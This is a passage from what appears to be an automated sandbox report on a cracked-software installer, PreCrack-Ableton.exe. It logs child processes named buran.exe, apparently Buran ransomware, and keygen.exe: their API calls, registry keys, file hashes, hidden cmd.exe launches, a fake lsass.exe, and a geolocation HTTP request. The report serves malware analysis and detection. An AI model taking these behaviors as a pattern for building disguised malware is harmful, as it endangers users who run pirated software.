| Get Handle | VERSION | base_address = 0x0 |
|
1 | |
| Get Handle | SHFOLDER | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\5p5nrg~1\appdata\local\temp\precrack-ableton.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | SHFOLDER | process_name = c:\users\5p5nrg~1\appdata\local\temp\precrack-ableton.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe, size = 1024 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoA, address_out = 0x74b51ced |
|
1 | |
| Get Address | c:\windows\syswow64\shfolder.dll | function = SHGetFolderPathA, address_out = 0x74721528 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultUILanguage, address_out = 0x76c344ab |
|
1 |
System (25)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Ticks, time = 101650 |
|
2 | |
| Get Time | type = Ticks, time = 101681 |
|
1 | |
| Get Time | type = Ticks, time = 101697 |
|
4 | |
| Get Time | type = Ticks, time = 101712 |
|
2 | |
| Get Time | type = Ticks, time = 101884 |
|
2 | |
| Get Time | type = Ticks, time = 101993 |
|
2 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
11 |
Process #3: buran.exe
99
2
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\users\5p5nrg~1\appdata\local\temp\buran.exe |
| Command Line | "C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe" |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:00:30, Reason: Child Process |
| Unmonitor | End Time: 00:00:43, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9cc |
| Parent PID | 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\b.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9D0
0x
9D4
0x
9E8
0x
9EC
0x
9F0
0x
9F4
0x
9FC
0x
A34
0x
AC4
0x
AC8
0x
ACC
0x
AF0
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| buran.exe | 0x00930000 | 0x00962FFF | Relevant Image | - | 32-bit | - |
|
|
|
| buran.exe | 0x00930000 | 0x00962FFF | Process Termination | - | 32-bit | - |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\5P5NRG~1\AppData\Local\Temp\AE785005.buran | 1 bytes |
MD5:
93b885adfe0da089cdf634904fd59f71
SHA1: 5ba93c9db0cff93f52b521d7420e43f6eda2784f SHA256: 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d SSDeep: 3:: |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat | 64.00 KB |
MD5:
2bce079661ae7497591e77443fe12cdd
SHA1: 587ab1082cecb06be9da420e3aff2b00fe791fc2 SHA256: 41b4918b9c44f19815f8000dcfbf6d281671f10d0b93c02a3ec449cfc9a9897e SSDeep: 192:eMlmiCi+ADS1/S4GSmNSGXSoSPSMS57SUS2StSuSRZSbJaSnSOS0S+2SnS0SESMr:Pkxi+ALyJ+i9X+VLKQXNHy |
|
|
| c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 64.00 KB |
MD5:
2db89fb48fd886b621627751f2ae15ed
SHA1: e2f78c6a535f4ba230a4470402b6f905f0b4c066 SHA256: dfc9aeb2ad6900a7b836db92a36a9d2162c84551134c0291757cc352206a3166 SSDeep: 384:gnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:6OLKYBdVZJptKF2KTFZTCzp++8 |
|
|
| c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB |
MD5:
74d69403f4a938faa28298c110bc71c3
SHA1: c016f27979d48a90bb341ccf7ffef41a3955f4d5 SHA256: 8b9d3a6a22778e368c9e81397e2b1af64b9739f7ade535966708f34bcf6eada9 SSDeep: 48:qMhaLouhzppiksLSLWFM+AWi3QTGnbYbQWy58V4l9:qO7appiksLSLaH0QCnMbQ5ll9 |
|
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\AE785005.buran | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\AE785005.buran | size = 1 |
|
1 | |
| Delete | C:\Users\5P5NRG~1\AppData\Local\Temp\AE785005.buran | - |
|
1 |
Registry (23)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
20 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xad0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | show_window = SW_HIDE |
|
1 |
Module (35)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.ENU | base_address = 0x0 |
|
1 | |
| Load | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.EN | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\5p5nrg~1\appdata\local\temp\buran.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x75220000 |
|
1 | |
| Get Filename | c:\users\5p5nrg~1\appdata\local\temp\buran.exe | process_name = c:\users\5p5nrg~1\appdata\local\temp\buran.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\users\5p5nrg~1\appdata\local\temp\buran.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe, size = 261 |
|
1 | |
| Get Filename | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.EN | process_name = c:\users\5p5nrg~1\appdata\local\temp\buran.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe, size = 261 |
|
2 | |
| Get Filename | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.EN | process_name = c:\users\5p5nrg~1\appdata\local\temp\buran.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe, size = 522 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExA, address_out = 0x76cb434f |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x75224c28 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x7529c802 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x7529ec66 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x75245934 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x7529d332 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x7529dbd4 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x7529e405 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x7529f00a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x7529f15e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x75245a98 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x7529ecfa |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x7529ee2e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x7523b0dc |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x75236fab |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x752401a0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x7523699e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x75246ba7 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x75266c12 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x7523dbd1 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x75247fdc |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x75237a2a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x75240355 |
|
1 |
Keyboard (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 0, result_out = 4 |
|
1 |
System (27)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
5 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
20 | |
| Get Time | type = Performance Ctr, time = 15190178058 |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = TEMP, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp |
|
2 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
2 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 39 bytes |
| Total Data Received | 380 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 158.69.67.193 |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | geoiptool.com |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 39 bytes |
| Data Received | 380 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = http, server_name = geoiptool.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://geoiptool.com |
|
1 | |
| Read Response | size = 1024, size_out = 1024 |
|
19 | |
| Read Response | size = 1024, size_out = 872 |
|
1 | |
| Read Response | size = 1024, size_out = 0 |
|
1 | |
| Close Session | - |
|
1 |
Process #4: keygen.exe
1006
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\5p5nrg~1\appdata\local\temp\keygen.exe |
| Command Line | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe |
| Initial Working Directory | C:\Users\5P5NRG~1\AppData\Local\Temp\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:01:05, Reason: Self Terminated |
| Monitor Duration | 00:00:32 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9e0 |
| Parent PID | 0x9bc (c:\users\5p5nrg~1\appdata\local\temp\precrack-ableton.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9E4
0x
9F8
0x
A00
0x
A1C
0x
A20
0x
A24
0x
A28
0x
A2C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| keygen.exe | 0x00400000 | 0x0043AFFF | Relevant Image | - | 32-bit | - |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x10012043 |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x1000D8F5 |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x1000CC7A |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x10001000 |
|
|
|
| buffer | 0x00270000 | 0x002A8FFF | First Execution | - | 32-bit | 0x00270000 |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x10009B2F |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x1000A06D |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x100022D2 |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x10006DC0 |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x100051A6, 0x100040CC, ... |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x1001204D |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x1000CB70 |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x10001775 |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x10008A6F |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x10006980 |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x10002355 |
|
|
|
| bassmod.dll | 0x10000000 | 0x10012FFF | Content Changed | - | 32-bit | 0x10005A4E, 0x1000493A, ... |
|
|
|
Host Behavior
File (152)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
7 | |
| Create | BASSMOD.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | R2RLIVE.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | bgm.xm | file_attributes = _O_RDONLY | _O_BINARY |
|
1 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | type = file_type |
|
7 | |
| Get Info | BASSMOD.dll | type = file_type |
|
1 | |
| Get Info | R2RLIVE.dll | type = file_type |
|
1 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | type = file_type |
|
3 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | type = file_type |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
2 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | size = 4096, size_out = 4096 |
|
104 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | size = 4096, size_out = 3695 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | size = 4096, size_out = 0 |
|
1 | |
| Read | bgm.xm | size = 1500, size_out = 1500 |
|
1 | |
| Read | bgm.xm | size = 1087859, size_out = 1087859 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | size = 102400, size_out = 102400 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | size = 4096, size_out = 3735 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | size = 307200, size_out = 307200 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | size = 4096, size_out = 4096 |
|
1 |
Module (187)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Atl71.dll | base_address = 0x0 |
|
1 | |
| Load | Atl.dll | base_address = 0x74930000 |
|
1 | |
| Load | comdlg32 | base_address = 0x74ec0000 |
|
1 | |
| Load | BASSMOD | base_address = 0x10000000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76c20000 |
|
1 | |
| Load | WINMM.dll | base_address = 0x74430000 |
|
1 | |
| Load | MSVCRT.dll | base_address = 0x74e10000 |
|
1 | |
| Load | USER32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75fd0000 |
|
1 | |
| Load | R2RLIVE.dll | base_address = 0x74350000 |
|
1 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x0 |
|
2 | |
| Load | kernel32 | base_address = 0x0 |
|
2 | |
| Load | kernel32 | base_address = 0x76c20000 |
|
2 | |
| Load | api-ms-win-core-fibers-l1-1-1 | base_address = 0x0 |
|
3 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x74650000 |
|
1 | |
| Load | api-ms-win-core-localization-l1-2-1 | base_address = 0x0 |
|
2 | |
| Load | api-ms-win-core-sysinfo-l1-2-1 | base_address = 0x0 |
|
2 | |
| Get Handle | c:\users\5p5nrg~1\appdata\local\temp\keygen.exe | base_address = 0x400000 |
|
2 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x74f40000 |
|
1 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x74d40000 |
|
1 | |
| Get Filename | - | process_name = c:\users\5p5nrg~1\appdata\local\temp\keygen.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe, size = 260 |
|
2 | |
| Get Filename | api-ms-win-core-localization-l1-2-1 | process_name = c:\users\5p5nrg~1\appdata\local\temp\keygen.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x76c35235 |
|
2 | |
| Get Address | c:\windows\syswow64\atl.dll | function = AtlAxWinInit, address_out = 0x7493c83f |
|
1 | |
| Get Address | c:\windows\syswow64\atl.dll | function = AtlAxGetControl, address_out = 0x74934ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = GetOpenFileNameA, address_out = 0x74efa2a9 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = GetSaveFileNameA, address_out = 0x74efa353 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77152270 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSection, address_out = 0x77162c42 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceFrequency, address_out = 0x76c341f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DisableThreadLibraryCalls, address_out = 0x76c348e5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x771522b0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x771645f5 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x76c31725 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPriority, address_out = 0x76c332bb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x76c317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x76c310ff |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutSetVolume, address_out = 0x7445535f |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutGetDevCapsA, address_out = 0x744550d6 |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = timeBeginPeriod, address_out = 0x74439ef7 |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = timeEndPeriod, address_out = 0x74439feb |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutGetPosition, address_out = 0x74455520 |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutWrite, address_out = 0x74434f7b |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = timeGetTime, address_out = 0x744326e0 |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutGetNumDevs, address_out = 0x74438f99 |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutOpen, address_out = 0x7443451e |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutClose, address_out = 0x74434b6d |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutPrepareHeader, address_out = 0x74434f0f |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutPause, address_out = 0x74455484 |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutReset, address_out = 0x7443adf9 |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutGetVolume, address_out = 0x744552e8 |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutUnprepareHeader, address_out = 0x74434bf2 |
|
1 | |
| Get Address | c:\windows\syswow64\winmm.dll | function = waveOutRestart, address_out = 0x744554b8 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _fileno, address_out = 0x74e1ac15 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _CIpow, address_out = 0x74e20d4d |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _CIexp, address_out = 0x74e355f7 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _strdup, address_out = 0x74e347ad |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _adjust_fdiv, address_out = 0x74eb32ec |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _initterm, address_out = 0x74e1c151 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = fread, address_out = 0x74e2f3c8 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _wfopen, address_out = 0x74e2f3ac |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = fopen, address_out = 0x74e2b2c4 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = fseek, address_out = 0x74e2f606 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _filelength, address_out = 0x74e244cd |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = fclose, address_out = 0x74e23d79 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _ftol, address_out = 0x74e28e2f |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x74e19cee |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = strtol, address_out = 0x74e3e8f0 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x74e19894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = rand, address_out = 0x74e1c070 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = _beginthread, address_out = 0x74e3f553 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = realloc, address_out = 0x74e1b10d |
|
1 | |
| Get Address | c:\users\5p5nrg~1\appdata\local\temp\bassmod.dll | function = BASSMOD_Free, address_out = 0x10008baa |
|
1 | |
| Get Address | c:\users\5p5nrg~1\appdata\local\temp\bassmod.dll | function = BASSMOD_Init, address_out = 0x10001267 |
|
1 | |
| Get Address | c:\users\5p5nrg~1\appdata\local\temp\bassmod.dll | function = BASSMOD_MusicFree, address_out = 0x1000c34e |
|
1 | |
| Get Address | c:\users\5p5nrg~1\appdata\local\temp\bassmod.dll | function = BASSMOD_MusicLoad, address_out = 0x10008f34 |
|
1 | |
| Get Address | c:\users\5p5nrg~1\appdata\local\temp\bassmod.dll | function = BASSMOD_MusicPlay, address_out = 0x1000c3dd |
|
1 | |
| Get Address | c:\users\5p5nrg~1\appdata\local\temp\bassmod.dll | function = BASSMOD_MusicStop, address_out = 0x10001144 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowLongA, address_out = 0x74f5d156 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowLongA, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ShowScrollBar, address_out = 0x74f64162 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = IsUserAnAdmin, address_out = 0x760244f5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x76c31410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x76c311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x76c3110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x76c334c8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x76c349d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalMemoryStatus, address_out = 0x76c38b6d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushConsoleInputBuffer, address_out = 0x76cd7a9f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x76c5772f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76c31809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x76c4d802 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x76c33509 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeSListHead, address_out = 0x771694a4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x76c34d40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x76c334b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedFlushSList, address_out = 0x77162775 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x76c5d1c3 |
|
1 | |
